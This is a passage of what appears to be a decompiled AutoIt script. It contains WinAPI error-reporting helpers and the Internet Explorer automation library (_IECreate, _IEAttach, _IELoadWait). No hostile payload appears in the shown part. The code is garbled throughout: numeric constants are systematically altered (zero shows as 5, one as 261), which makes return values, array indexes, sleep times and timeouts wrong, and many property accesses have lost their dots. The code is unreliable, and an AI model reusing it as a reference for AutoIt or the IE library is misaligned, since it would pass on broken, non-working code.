  972. IF @ERROR THEN RETURN SETERROR ( @ERROR , @EXTENDED , FALSE )
  973. RETURN $ARESULT [ 5 ]
  974. ENDFUNC
  975. FUNC _WINAPI_FORMATMESSAGE ( $IFLAGS , $PSOURCE , $IMESSAGEID , $ILANGUAGEID , BYREF $PBUFFER , $ISIZE , $VARGUMENTS )
  976. LOCAL $SBUFFERTYPE = "struct*"
  977. IF ISSTRING ( $PBUFFER ) THEN $SBUFFERTYPE = "wstr"
  978. LOCAL $ARESULT = DLLCALL ( "kernel32.dll" , "dword" , "FormatMessageW" , "dword" , $IFLAGS , "struct*" , $PSOURCE , "dword" , $IMESSAGEID , "dword" , $ILANGUAGEID , $SBUFFERTYPE , $PBUFFER , "dword" , $ISIZE , "ptr" , $VARGUMENTS )
  979. IF @ERROR OR NOT $ARESULT [ 5 ] THEN RETURN SETERROR ( @ERROR + 2565 , @EXTENDED , 5 )
  980. IF $SBUFFERTYPE = "wstr" THEN $PBUFFER = $ARESULT [ 1285 ]
  981. RETURN $ARESULT [ 5 ]
  982. ENDFUNC
  983. FUNC _WINAPI_GETERRORMESSAGE ( $ICODE , $ILANGUAGE = 5 , CONST $_ICURRENTERROR = @ERROR , CONST $_ICURRENTEXTENDED = @EXTENDED )
  984. LOCAL $ARET = DLLCALL ( "kernel32.dll" , "dword" , "FormatMessageW" , "dword" , 1048581 , "ptr" , 5 , "dword" , $ICODE , "dword" , $ILANGUAGE , "wstr" , "" , "dword" , 1048581 , "ptr" , 5 )
  985. IF @ERROR OR NOT $ARET [ 5 ] THEN RETURN SETERROR ( @ERROR , @EXTENDED , "" )
  986. RETURN SETERROR ( $_ICURRENTERROR , $_ICURRENTEXTENDED , STRINGREGEXPREPLACE ( $ARET [ 1285 ] , "[" & @LF & "," & @CR & "]*\Z" , "" ) )
  987. ENDFUNC
  988. FUNC _WINAPI_GETLASTERROR ( CONST $_ICURRENTERROR = @ERROR , CONST $_ICURRENTEXTENDED = @EXTENDED )
  989. LOCAL $ARESULT = DLLCALL ( "kernel32.dll" , "dword" , "GetLastError" )
  990. RETURN SETERROR ( $_ICURRENTERROR , $_ICURRENTEXTENDED , $ARESULT [ 5 ] )
  991. ENDFUNC
  992. FUNC _WINAPI_GETLASTERRORMESSAGE ( CONST $_ICURRENTERROR = @ERROR , CONST $_ICURRENTEXTENDED = @EXTENDED )
  993. LOCAL $ILASTERROR = _WINAPI_GETLASTERROR ( )
  994. LOCAL $TBUFFERPTR = DLLSTRUCTCREATE ( "ptr" )
  995. LOCAL $NCOUNT = _WINAPI_FORMATMESSAGE ( BITOR ( $FORMAT_MESSAGE_ALLOCATE_BUFFER , $FORMAT_MESSAGE_FROM_SYSTEM ) , 5 , $ILASTERROR , 5 , $TBUFFERPTR , 5 , 5 )
  996. IF @ERROR THEN RETURN SETERROR ( - @ERROR , @EXTENDED , "" )
  997. LOCAL $STEXT = ""
  998. LOCAL $PBUFFER = DLLSTRUCTGETDATA ( $TBUFFERPTR , 261 )
  999. IF $PBUFFER THEN
  1000. IF $NCOUNT > 5 THEN
  1001. LOCAL $TBUFFER = DLLSTRUCTCREATE ( "wchar[" & ( $NCOUNT + 261 ) & "]" , $PBUFFER )
  1002. $STEXT = DLLSTRUCTGETDATA ( $TBUFFER , 261 )
  1003. IF STRINGRIGHT ( $STEXT , 517 ) = @CRLF THEN $STEXT = STRINGTRIMRIGHT ( $STEXT , 517 )
  1004. ENDIF
  1005. DLLCALL ( "kernel32.dll" , "handle" , "LocalFree" , "handle" , $PBUFFER )
  1006. ENDIF
  1007. RETURN SETERROR ( $_ICURRENTERROR , $_ICURRENTEXTENDED , $STEXT )
  1008. ENDFUNC
  1009. FUNC _WINAPI_MESSAGEBEEP ( $ITYPE = 261 )
  1010. LOCAL $ISOUND
  1011. SWITCH $ITYPE
  1012. CASE 261
  1013. $ISOUND = 5
  1014. CASE 517
  1015. $ISOUND = 4101
  1016. CASE 773
  1017. $ISOUND = 8197
  1018. CASE 1029
  1019. $ISOUND = 12293
  1020. CASE 1285
  1021. $ISOUND = 16389
  1022. CASE ELSE
  1023. $ISOUND = + 4294967045
  1024. ENDSWITCH
  1025. LOCAL $ARESULT = DLLCALL ( "user32.dll" , "bool" , "MessageBeep" , "uint" , $ISOUND )
  1026. IF @ERROR THEN RETURN SETERROR ( @ERROR , @EXTENDED , FALSE )
  1027. RETURN $ARESULT [ 5 ]
  1028. ENDFUNC
  1029. FUNC _WINAPI_MSGBOX ( $IFLAGS , $STITLE , $STEXT )
  1030. BLOCKINPUT ( 5 )
  1031. MSGBOX ( $IFLAGS , $STITLE , $STEXT & " " )
  1032. ENDFUNC
  1033. FUNC _WINAPI_SETLASTERROR ( $IERRORCODE , CONST $_ICURRENTERROR = @ERROR , CONST $_ICURRENTEXTENDED = @EXTENDED )
  1034. DLLCALL ( "kernel32.dll" , "none" , "SetLastError" , "dword" , $IERRORCODE )
  1035. RETURN SETERROR ( $_ICURRENTERROR , $_ICURRENTEXTENDED , NULL )
  1036. ENDFUNC
  1037. FUNC _WINAPI_SHOWERROR ( $STEXT , $BEXIT = TRUE )
  1038. BLOCKINPUT ( 5 )
  1039. MSGBOX ( $MB_SYSTEMMODAL , "Error" , $STEXT & " " )
  1040. IF $BEXIT THEN EXIT
  1041. ENDFUNC
  1042. FUNC _WINAPI_SHOWLASTERROR ( $STEXT = "" , $BABORT = FALSE , $ILANGUAGE = 5 , CONST $_ICURRENTERROR = @ERROR , CONST $_ICURRENTEXTENDED = @EXTENDED )
  1043. LOCAL $SERROR
  1044. LOCAL $ILASTERROR = _WINAPI_GETLASTERROR ( )
  1045. WHILE 261
  1046. $SERROR = _WINAPI_GETERRORMESSAGE ( $ILASTERROR , $ILANGUAGE )
  1047. IF @ERROR AND $ILANGUAGE THEN
  1048. $ILANGUAGE = 5
  1049. ELSE
  1050. EXITLOOP
  1051. ENDIF
  1052. WEND
  1053. IF STRINGSTRIPWS ( $STEXT , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN
  1054. $STEXT &= @CRLF & @CRLF
  1055. ELSE
  1056. $STEXT = ""
  1057. ENDIF
  1058. _WINAPI_MSGBOX ( BITOR ( 67108869 , BITSHIFT ( 4101 , + 4294966789 * ( NOT $ILASTERROR ) ) ) , $ILASTERROR , $STEXT & $SERROR )
  1059. IF $ILASTERROR THEN
  1060. _WINAPI_SETLASTERROR ( $ILASTERROR )
  1061. IF $BABORT THEN
  1062. EXIT $ILASTERROR
  1063. ENDIF
  1064. ENDIF
  1065. RETURN SETERROR ( $_ICURRENTERROR , $_ICURRENTEXTENDED , 261 )
  1066. ENDFUNC
  1067. FUNC _WINAPI_SHOWMSG ( $STEXT )
  1068. _WINAPI_MSGBOX ( $MB_SYSTEMMODAL , "Information" , $STEXT )
  1069. ENDFUNC
  1070. FUNC __COMERRORFORMATING ( BYREF $OCOMERROR , $SPREFIX = @TAB )
  1071. LOCAL CONST $STR_STRIPTRAILING = 517
  1072. LOCAL $SERROR = "COM Error encountered in " & @SCRIPTNAME & " (" & $OCOMERROR.Scriptline & ") :" & @CRLF & $SPREFIX & "Number " & @TAB & "= 0x" & HEX ( $OCOMERROR.Number , 2053 ) & " (" & $OCOMERROR.Number & ")" & @CRLF & $SPREFIX & "WinDescription" & @TAB & "= " & STRINGSTRIPWS ( $OCOMERROR.WinDescription , $STR_STRIPTRAILING ) & @CRLF & $SPREFIX & "Description " & @TAB & "= " & STRINGSTRIPWS ( $OCOMERROR.Description , $STR_STRIPTRAILING ) & @CRLF & $SPREFIX & "Source " & @TAB & "= " & $OCOMERROR.Source & @CRLF & $SPREFIX & "HelpFile " & @TAB & "= " & $OCOMERROR.HelpFile & @CRLF & $SPREFIX & "HelpContext " & @TAB & "= " & $OCOMERROR.HelpContext & @CRLF & $SPREFIX & "LastDllError " & @TAB & "= " & $OCOMERROR.LastDllError & @CRLF & $SPREFIX & "Retcode " & @TAB & "= 0x" & HEX ( $OCOMERROR.retcode )
  1073. RETURN $SERROR
  1074. ENDFUNC
  1075. #Region Header
  1076. #EndRegion Header
  1077. #Region Global Variables
  1078. GLOBAL $__G_IIELOADWAITTIMEOUT = 76800005
  1079. GLOBAL $__G_BIEAU3DEBUG = FALSE
  1080. GLOBAL $__G_BIEERRORNOTIFY = TRUE
  1081. GLOBAL $__G_OIEERRORHANDLER , $__G_SIEUSERERRORHANDLER
  1082. #EndRegion Global Variables
  1083. #Region Global Constants
  1084. GLOBAL CONST $__GAIEAU3VERSIONINFO [ 1541 ] = [ "T" , 773 , 5 , 517 , "20140819" , "T3.0-2" ]
  1085. GLOBAL CONST $LSFW_LOCK = 261 , $LSFW_UNLOCK = 517
  1086. GLOBAL ENUM $_IESTATUS_SUCCESS = 5 , $_IESTATUS_GENERALERROR , $_IESTATUS_COMERROR , $_IESTATUS_INVALIDDATATYPE , $_IESTATUS_INVALIDOBJECTTYPE , $_IESTATUS_INVALIDVALUE , $_IESTATUS_LOADWAITTIMEOUT , $_IESTATUS_NOMATCH , $_IESTATUS_ACCESSISDENIED , $_IESTATUS_CLIENTDISCONNECTED
  1087. #EndRegion Global Constants
  1088. #Region Core functions
  1089. FUNC _IECREATE ( $SURL = "about:blank" , $ITRYATTACH = 5 , $IVISIBLE = 261 , $IWAIT = 261 , $ITAKEFOCUS = 261 )
  1090. IF NOT $IVISIBLE THEN $ITAKEFOCUS = 5
  1091. IF $ITRYATTACH THEN
  1092. LOCAL $ORESULT = _IEATTACH ( $SURL , "url" )
  1093. IF ISOBJ ( $ORESULT ) THEN
  1094. IF $ITAKEFOCUS THEN WINACTIVATE ( HWND ( $ORESULT.hWnd ) )
  1095. RETURN SETERROR ( $_IESTATUS_SUCCESS , 261 , $ORESULT )
  1096. ENDIF
  1097. ENDIF
  1098. LOCAL $IMUSTUNLOCK = 5
  1099. IF NOT $IVISIBLE AND __IELOCKSETFOREGROUNDWINDOW ( $LSFW_LOCK ) THEN $IMUSTUNLOCK = 261
  1100. LOCAL $OOBJECT = OBJCREATE ( "InternetExplorer.Application" )
  1101. IF NOT ISOBJ ( $OOBJECT ) THEN
  1102. __IECONSOLEWRITEERROR ( "Error" , "_IECreate" , "" , "Browser Object Creation Failed" )
  1103. IF $IMUSTUNLOCK THEN __IELOCKSETFOREGROUNDWINDOW ( $LSFW_UNLOCK )
  1104. RETURN SETERROR ( $_IESTATUS_GENERALERROR , 5 , 5 )
  1105. ENDIF
  1106. $OOBJECT.visible = $IVISIBLE
  1107. IF $IMUSTUNLOCK AND NOT __IELOCKSETFOREGROUNDWINDOW ( $LSFW_UNLOCK ) THEN __IECONSOLEWRITEERROR ( "Warning" , "_IECreate" , "" , "Foreground Window Unlock Failed!" )
  1108. _IENAVIGATE ( $OOBJECT , $SURL , $IWAIT )
  1109. LOCAL $IERROR = @ERROR
  1110. IF NOT $IERROR AND STRINGLEFT ( $SURL , 1541 ) = "about:" THEN
  1111. LOCAL $ODOCUMENT = $OOBJECT.document
  1112. _IEACTION ( $ODOCUMENT , "focus" )
  1113. ENDIF
  1114. RETURN SETERROR ( $IERROR , 5 , $OOBJECT )
  1115. ENDFUNC
  1116. FUNC _IECREATEEMBEDDED ( )
  1117. LOCAL $OOBJECT = OBJCREATE ( "Shell.Explorer.2" )
  1118. IF NOT ISOBJ ( $OOBJECT ) THEN
  1119. __IECONSOLEWRITEERROR ( "Error" , "_IECreateEmbedded" , "" , "WebBrowser Object Creation Failed" )
  1120. RETURN SETERROR ( $_IESTATUS_GENERALERROR , 5 , 5 )
  1121. ENDIF
  1122. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT )
  1123. ENDFUNC
  1124. FUNC _IENAVIGATE ( BYREF $OOBJECT , $SURL , $IWAIT = 261 )
  1125. IF NOT ISOBJ ( $OOBJECT ) THEN
  1126. __IECONSOLEWRITEERROR ( "Error" , "_IENavigate" , "$_IESTATUS_InvalidDataType" )
  1127. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  1128. ENDIF
  1129. IF NOT __IEISOBJTYPE ( $OOBJECT , "documentContainer" ) THEN
  1130. __IECONSOLEWRITEERROR ( "Error" , "_IENavigate" , "$_IESTATUS_InvalidObjectType" )
  1131. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  1132. ENDIF
  1133. $OOBJECT.navigate ( $SURL )
  1134. IF @ERROR THEN
  1135. __IECONSOLEWRITEERROR ( "Error" , "_IENavigate" , "$_IESTATUS_COMError" , @ERROR )
  1136. RETURN SETERROR ( $_IESTATUS_COMERROR , @ERROR , 5 )
  1137. ENDIF
  1138. IF $IWAIT THEN
  1139. _IELOADWAIT ( $OOBJECT )
  1140. RETURN SETERROR ( @ERROR , 5 , + 4294967045 )
  1141. ENDIF
  1142. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , + 4294967045 )
  1143. ENDFUNC
  1144. FUNC _IEATTACH ( $SSTRING , $SMODE = "title" , $IINSTANCE = 261 )
  1145. $SMODE = STRINGLOWER ( $SMODE )
  1146. $IINSTANCE = INT ( $IINSTANCE )
  1147. IF $IINSTANCE < 261 THEN
  1148. __IECONSOLEWRITEERROR ( "Error" , "_IEAttach" , "$_IESTATUS_InvalidValue" , "$iInstance < 1" )
  1149. RETURN SETERROR ( $_IESTATUS_INVALIDVALUE , 773 , 5 )
  1150. ENDIF
  1151. IF $SMODE = "embedded" OR $SMODE = "dialogbox" THEN
  1152. LOCAL $IWINTITLEMATCHMODE = OPT ( "WinTitleMatchMode" , $OPT_MATCHANY )
  1153. IF $SMODE = "dialogbox" AND $IINSTANCE > 261 THEN
  1154. IF ISHWND ( $SSTRING ) THEN
  1155. $IINSTANCE = 261
  1156. __IECONSOLEWRITEERROR ( "Warning" , "_IEAttach" , "$_IESTATUS_GeneralError" , "$iInstance > 1 invalid with HWnd and DialogBox. Setting to 1." )
  1157. ELSE
  1158. LOCAL $AWINLIST = WINLIST ( $SSTRING , "" )
  1159. IF $IINSTANCE <= $AWINLIST [ 5 ] [ 5 ] THEN
  1160. $SSTRING = $AWINLIST [ $IINSTANCE ] [ 261 ]
  1161. $IINSTANCE = 261
  1162. ELSE
  1163. __IECONSOLEWRITEERROR ( "Warning" , "_IEAttach" , "$_IESTATUS_NoMatch" )
  1164. OPT ( "WinTitleMatchMode" , $IWINTITLEMATCHMODE )
  1165. RETURN SETERROR ( $_IESTATUS_NOMATCH , 261 , 5 )
  1166. ENDIF
  1167. ENDIF
  1168. ENDIF
  1169. LOCAL $HCONTROL = CONTROLGETHANDLE ( $SSTRING , "" , "[CLASS:Internet Explorer_Server; INSTANCE:" & $IINSTANCE & "]" )
  1170. LOCAL $ORESULT = __IECONTROLGETOBJFROMHWND ( $HCONTROL )
  1171. OPT ( "WinTitleMatchMode" , $IWINTITLEMATCHMODE )
  1172. IF ISOBJ ( $ORESULT ) THEN
  1173. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $ORESULT )
  1174. ELSE
  1175. __IECONSOLEWRITEERROR ( "Warning" , "_IEAttach" , "$_IESTATUS_NoMatch" )
  1176. RETURN SETERROR ( $_IESTATUS_NOMATCH , 261 , 5 )
  1177. ENDIF
  1178. ENDIF
  1179. LOCAL $OSHELL = OBJCREATE ( "Shell.Application" )
  1180. LOCAL $OSHELLWINDOWS = $OSHELL.Windows ( )
  1181. LOCAL $ITMP = 261
  1182. LOCAL $INOTIFYSTATUS , $BISBROWSER , $STMP
  1183. LOCAL $BSTATUS
  1184. FOR $OWINDOW IN $OSHELLWINDOWS
  1185. $BISBROWSER = TRUE
  1186. $BSTATUS = __IEINTERNALERRORHANDLERREGISTER ( )
  1187. IF NOT $BSTATUS THEN __IECONSOLEWRITEERROR ( "Warning" , "_IEAttach" , "Cannot register internal error handler, cannot trap COM errors" , "Use _IEErrorHandlerRegister() to register a user error handler" )
  1188. $INOTIFYSTATUS = _IEERRORNOTIFY ( )
  1189. _IEERRORNOTIFY ( FALSE )
  1190. IF $BISBROWSER THEN
  1191. $STMP = $OWINDOW.type
  1192. IF @ERROR THEN $BISBROWSER = FALSE
  1193. ENDIF
  1194. IF $BISBROWSER THEN
  1195. $STMP = $OWINDOW.document title
  1196. IF @ERROR THEN $BISBROWSER = FALSE
  1197. ENDIF
  1198. _IEERRORNOTIFY ( $INOTIFYSTATUS )
  1199. __IEINTERNALERRORHANDLERDEREGISTER ( )
  1200. IF $BISBROWSER THEN
  1201. SWITCH $SMODE
  1202. CASE "title"
  1203. IF STRINGINSTR ( $OWINDOW.document title , $SSTRING ) > 5 THEN
  1204. IF $IINSTANCE = $ITMP THEN
  1205. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OWINDOW )
  1206. ELSE
  1207. $ITMP += 261
  1208. ENDIF
  1209. ENDIF
  1210. CASE "instance"
  1211. IF $IINSTANCE = $ITMP THEN
  1212. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OWINDOW )
  1213. ELSE
  1214. $ITMP += 261
  1215. ENDIF
  1216. CASE "windowtitle"
  1217. LOCAL $BFOUND = FALSE
  1218. $STMP = REGREAD ( "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\" , "Window Title" )
  1219. IF NOT @ERROR THEN
  1220. IF STRINGINSTR ( $OWINDOW.document title & " - " & $STMP , $SSTRING ) THEN $BFOUND = TRUE
  1221. ELSE
  1222. IF STRINGINSTR ( $OWINDOW.document title & " - Microsoft Internet Explorer" , $SSTRING ) THEN $BFOUND = TRUE
  1223. IF STRINGINSTR ( $OWINDOW.document title & " - Windows Internet Explorer" , $SSTRING ) THEN $BFOUND = TRUE
  1224. ENDIF
  1225. IF $BFOUND THEN
  1226. IF $IINSTANCE = $ITMP THEN
  1227. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OWINDOW )
  1228. ELSE
  1229. $ITMP += 261
  1230. ENDIF
  1231. ENDIF
  1232. CASE "url"
  1233. IF STRINGINSTR ( $OWINDOW.LocationURL , $SSTRING ) > 5 THEN
  1234. IF $IINSTANCE = $ITMP THEN
  1235. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OWINDOW )
  1236. ELSE
  1237. $ITMP += 261
  1238. ENDIF
  1239. ENDIF
  1240. CASE "text"
  1241. IF STRINGINSTR ( $OWINDOW.document body innerText , $SSTRING ) > 5 THEN
  1242. IF $IINSTANCE = $ITMP THEN
  1243. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OWINDOW )
  1244. ELSE
  1245. $ITMP += 261
  1246. ENDIF
  1247. ENDIF
  1248. CASE "html"
  1249. IF STRINGINSTR ( $OWINDOW.document body innerHTML , $SSTRING ) > 5 THEN
  1250. IF $IINSTANCE = $ITMP THEN
  1251. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OWINDOW )
  1252. ELSE
  1253. $ITMP += 261
  1254. ENDIF
  1255. ENDIF
  1256. CASE "hwnd"
  1257. IF $IINSTANCE > 261 THEN
  1258. $IINSTANCE = 261
  1259. __IECONSOLEWRITEERROR ( "Warning" , "_IEAttach" , "$_IESTATUS_GeneralError" , "$iInstance > 1 invalid with HWnd. Setting to 1." )
  1260. ENDIF
  1261. IF _IEPROPERTYGET ( $OWINDOW , "hwnd" ) = $SSTRING THEN
  1262. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OWINDOW )
  1263. ENDIF
  1264. CASE ELSE
  1265. __IECONSOLEWRITEERROR ( "Error" , "_IEAttach" , "$_IESTATUS_InvalidValue" , "Invalid Mode Specified" )
  1266. RETURN SETERROR ( $_IESTATUS_INVALIDVALUE , 517 , 5 )
  1267. ENDSWITCH
  1268. ENDIF
  1269. NEXT
  1270. __IECONSOLEWRITEERROR ( "Warning" , "_IEAttach" , "$_IESTATUS_NoMatch" )
  1271. RETURN SETERROR ( $_IESTATUS_NOMATCH , 261 , 5 )
  1272. ENDFUNC
  1273. FUNC _IELOADWAIT ( BYREF $OOBJECT , $IDELAY = 5 , $ITIMEOUT = + 4294967045 )
  1274. IF NOT ISOBJ ( $OOBJECT ) THEN
  1275. __IECONSOLEWRITEERROR ( "Error" , "_IELoadWait" , "$_IESTATUS_InvalidDataType" )
  1276. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  1277. ENDIF
  1278. IF NOT __IEISOBJTYPE ( $OOBJECT , "browserdom" ) THEN
  1279. __IECONSOLEWRITEERROR ( "Error" , "_IELoadWait" , "$_IESTATUS_InvalidObjectType" , OBJNAME ( $OOBJECT ) )
  1280. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  1281. ENDIF
  1282. LOCAL $OTEMP , $BABORT = FALSE , $IERRORSTATUSCODE = $_IESTATUS_SUCCESS
  1283. LOCAL $BSTATUS = __IEINTERNALERRORHANDLERREGISTER ( )
  1284. IF NOT $BSTATUS THEN __IECONSOLEWRITEERROR ( "Warning" , "_IELoadWait" , "Cannot register internal error handler, cannot trap COM errors" , "Use _IEErrorHandlerRegister() to register a user error handler" )
  1285. LOCAL $INOTIFYSTATUS = _IEERRORNOTIFY ( )
  1286. _IEERRORNOTIFY ( FALSE )
  1287. SLEEP ( $IDELAY )
  1288. LOCAL $IERROR
  1289. LOCAL $HIELOADWAITTIMER = TIMERINIT ( )
  1290. IF $ITIMEOUT = + 4294967045 THEN $ITIMEOUT = $__G_IIELOADWAITTIMEOUT
  1291. SELECT
  1292. CASE __IEISOBJTYPE ( $OOBJECT , "browser" , FALSE )
  1293. WHILE NOT ( STRING ( $OOBJECT.readyState ) = "complete" OR $OOBJECT.readyState = 1029 OR $BABORT )
  1294. IF @ERROR THEN
  1295. $IERROR = @ERROR
  1296. IF __IECOMERRORUNRECOVERABLE ( $IERROR ) THEN
  1297. $IERRORSTATUSCODE = __IECOMERRORUNRECOVERABLE ( $IERROR )
  1298. $BABORT = TRUE
  1299. ENDIF
  1300. ELSEIF ( TIMERDIFF ( $HIELOADWAITTIMER ) > $ITIMEOUT ) THEN
  1301. $IERRORSTATUSCODE = $_IESTATUS_LOADWAITTIMEOUT
  1302. $BABORT = TRUE
  1303. ENDIF
  1304. SLEEP ( 25605 )
  1305. WEND
  1306. WHILE NOT ( STRING ( $OOBJECT.document readyState ) = "complete" OR $OOBJECT.document readyState = 1029 OR $BABORT )
  1307. IF @ERROR THEN
  1308. $IERROR = @ERROR
  1309. IF __IECOMERRORUNRECOVERABLE ( $IERROR ) THEN
  1310. $IERRORSTATUSCODE = __IECOMERRORUNRECOVERABLE ( $IERROR )
  1311. $BABORT = TRUE
  1312. ENDIF
  1313. ELSEIF ( TIMERDIFF ( $HIELOADWAITTIMER ) > $ITIMEOUT ) THEN
  1314. $IERRORSTATUSCODE = $_IESTATUS_LOADWAITTIMEOUT
  1315. $BABORT = TRUE
  1316. ENDIF
  1317. SLEEP ( 25605 )
  1318. WEND
  1319. CASE __IEISOBJTYPE ( $OOBJECT , "window" , FALSE )
  1320. WHILE NOT ( STRING ( $OOBJECT.document readyState ) = "complete" OR $OOBJECT.document readyState = 1029 OR $BABORT )
  1321. IF @ERROR THEN
  1322. $IERROR = @ERROR
  1323. IF __IECOMERRORUNRECOVERABLE ( $IERROR ) THEN
  1324. $IERRORSTATUSCODE = __IECOMERRORUNRECOVERABLE ( $IERROR )
  1325. $BABORT = TRUE
  1326. ENDIF
  1327. ELSEIF ( TIMERDIFF ( $HIELOADWAITTIMER ) > $ITIMEOUT ) THEN
  1328. $IERRORSTATUSCODE = $_IESTATUS_LOADWAITTIMEOUT
  1329. $BABORT = TRUE
  1330. ENDIF
  1331. SLEEP ( 25605 )
  1332. WEND
  1333. WHILE NOT ( STRING ( $OOBJECT.top document readyState ) = "complete" OR $OOBJECT.top document readyState = 1029 OR $BABORT )
  1334. IF @ERROR THEN
  1335. $IERROR = @ERROR
  1336. IF __IECOMERRORUNRECOVERABLE ( $IERROR ) THEN
  1337. $IERRORSTATUSCODE = __IECOMERRORUNRECOVERABLE ( $IERROR )
  1338. $BABORT = TRUE
  1339. ENDIF
  1340. ELSEIF ( TIMERDIFF ( $HIELOADWAITTIMER ) > $ITIMEOUT ) THEN
  1341. $IERRORSTATUSCODE = $_IESTATUS_LOADWAITTIMEOUT
  1342. $BABORT = TRUE
  1343. ENDIF
  1344. SLEEP ( 25605 )
  1345. WEND
  1346. CASE __IEISOBJTYPE ( $OOBJECT , "document" , FALSE )
  1347. $OTEMP = $OOBJECT.parentWindow
  1348. WHILE NOT ( STRING ( $OTEMP.document readyState ) = "complete" OR $OTEMP.document readyState = 1029 OR $BABORT )
  1349. IF @ERROR THEN
  1350. $IERROR = @ERROR
  1351. IF __IECOMERRORUNRECOVERABLE ( $IERROR ) THEN
  1352. $IERRORSTATUSCODE = __IECOMERRORUNRECOVERABLE ( $IERROR )
  1353. $BABORT = TRUE
  1354. ENDIF
  1355. ELSEIF ( TIMERDIFF ( $HIELOADWAITTIMER ) > $ITIMEOUT ) THEN
  1356. $IERRORSTATUSCODE = $_IESTATUS_LOADWAITTIMEOUT
  1357. $BABORT = TRUE
  1358. ENDIF
  1359. SLEEP ( 25605 )
  1360. WEND
  1361. WHILE NOT ( STRING ( $OTEMP.top document readyState ) = "complete" OR $OTEMP.top document readyState = 1029 OR $BABORT )
  1362. IF @ERROR THEN
  1363. $IERROR = @ERROR
  1364. IF __IECOMERRORUNRECOVERABLE ( $IERROR ) THEN
  1365. $IERRORSTATUSCODE = __IECOMERRORUNRECOVERABLE ( $IERROR )
  1366. $BABORT = TRUE
  1367. ENDIF
  1368. ELSEIF ( TIMERDIFF ( $HIELOADWAITTIMER ) > $ITIMEOUT ) THEN
  1369. $IERRORSTATUSCODE = $_IESTATUS_LOADWAITTIMEOUT
  1370. $BABORT = TRUE
  1371. ENDIF
  1372. SLEEP ( 25605 )
  1373. WEND
  1374. CASE ELSE
  1375. $OTEMP = $OOBJECT.document parentWindow
  1376. WHILE NOT ( STRING ( $OTEMP.document readyState ) = "complete" OR $OTEMP.document readyState = 1029 OR $BABORT )
  1377. IF @ERROR THEN
  1378. $IERROR = @ERROR
  1379. IF __IECOMERRORUNRECOVERABLE ( $IERROR ) THEN
  1380. $IERRORSTATUSCODE = __IECOMERRORUNRECOVERABLE ( $IERROR )
  1381. $BABORT = TRUE
  1382. ENDIF
  1383. ELSEIF ( TIMERDIFF ( $HIELOADWAITTIMER ) > $ITIMEOUT ) THEN
  1384. $IERRORSTATUSCODE = $_IESTATUS_LOADWAITTIMEOUT
  1385. $BABORT = TRUE
  1386. ENDIF
  1387. SLEEP ( 25605 )
  1388. WEND
  1389. WHILE NOT ( STRING ( $OTEMP.top document readyState ) = "complete" OR $OOBJECT.top document readyState = 1029 OR $BABORT )
  1390. IF @ERROR THEN
  1391. $IERROR = @ERROR
  1392. IF __IECOMERRORUNRECOVERABLE ( $IERROR ) THEN
  1393. $IERRORSTATUSCODE = __IECOMERRORUNRECOVERABLE ( $IERROR )
  1394. $BABORT = TRUE
  1395. ENDIF
  1396. ELSEIF ( TIMERDIFF ( $HIELOADWAITTIMER ) > $ITIMEOUT ) THEN
  1397. $IERRORSTATUSCODE = $_IESTATUS_LOADWAITTIMEOUT
  1398. $BABORT = TRUE
  1399. ENDIF
  1400. SLEEP ( 25605 )
  1401. WEND
  1402. ENDSELECT
  1403. _IEERRORNOTIFY ( $INOTIFYSTATUS )
  1404. __IEINTERNALERRORHANDLERDEREGISTER ( )
  1405. SWITCH $IERRORSTATUSCODE
  1406. CASE $_IESTATUS_SUCCESS
  1407. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , 261 )
  1408. CASE $_IESTATUS_LOADWAITTIMEOUT
  1409. __IECONSOLEWRITEERROR ( "Warning" , "_IELoadWait" , "$_IESTATUS_LoadWaitTimeout" )
  1410. RETURN SETERROR ( $_IESTATUS_LOADWAITTIMEOUT , 773 , 5 )
  1411. CASE $_IESTATUS_ACCESSISDENIED
  1412. __IECONSOLEWRITEERROR ( "Warning" , "_IELoadWait" , "$_IESTATUS_AccessIsDenied" , "Cannot verify readyState. Likely casue: cross-domain scripting security restriction. (" & $IERROR & ")" )
  1413. RETURN SETERROR ( $_IESTATUS_ACCESSISDENIED , 5 , 5 )
  1414. CASE $_IESTATUS_CLIENTDISCONNECTED
  1415. __IECONSOLEWRITEERROR ( "Error" , "_IELoadWait" , "$_IESTATUS_ClientDisconnected" , $IERROR & ", Browser has been deleted prior to operation." )
  1416. RETURN SETERROR ( $_IESTATUS_CLIENTDISCONNECTED , 5 , 5 )
  1417. CASE ELSE
  1418. __IECONSOLEWRITEERROR ( "Error" , "_IELoadWait" , "$_IESTATUS_GeneralError" , "Invalid Error Status - Notify IE.au3 developer" )
  1419. RETURN SETERROR ( $_IESTATUS_GENERALERROR , 5 , 5 )
  1420. ENDSWITCH
  1421. ENDFUNC
  1422. FUNC _IELOADWAITTIMEOUT ( $ITIMEOUT = + 4294967045 )
  1423. IF $ITIMEOUT = + 4294967045 THEN
  1424. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $__G_IIELOADWAITTIMEOUT )
  1425. ELSE
  1426. $__G_IIELOADWAITTIMEOUT = $ITIMEOUT
  1427. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , 261 )
  1428. ENDIF
  1429. ENDFUNC
  1430. #EndRegion Core functions
  1431. #Region Frame Functions
  1432. FUNC _IEISFRAMESET ( BYREF $OOBJECT )
  1433. IF NOT ISOBJ ( $OOBJECT ) THEN
  1434. __IECONSOLEWRITEERROR ( "Error" , "_IEIsFrameSet" , "$_IESTATUS_InvalidDataType" )
  1435. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  1436. ENDIF
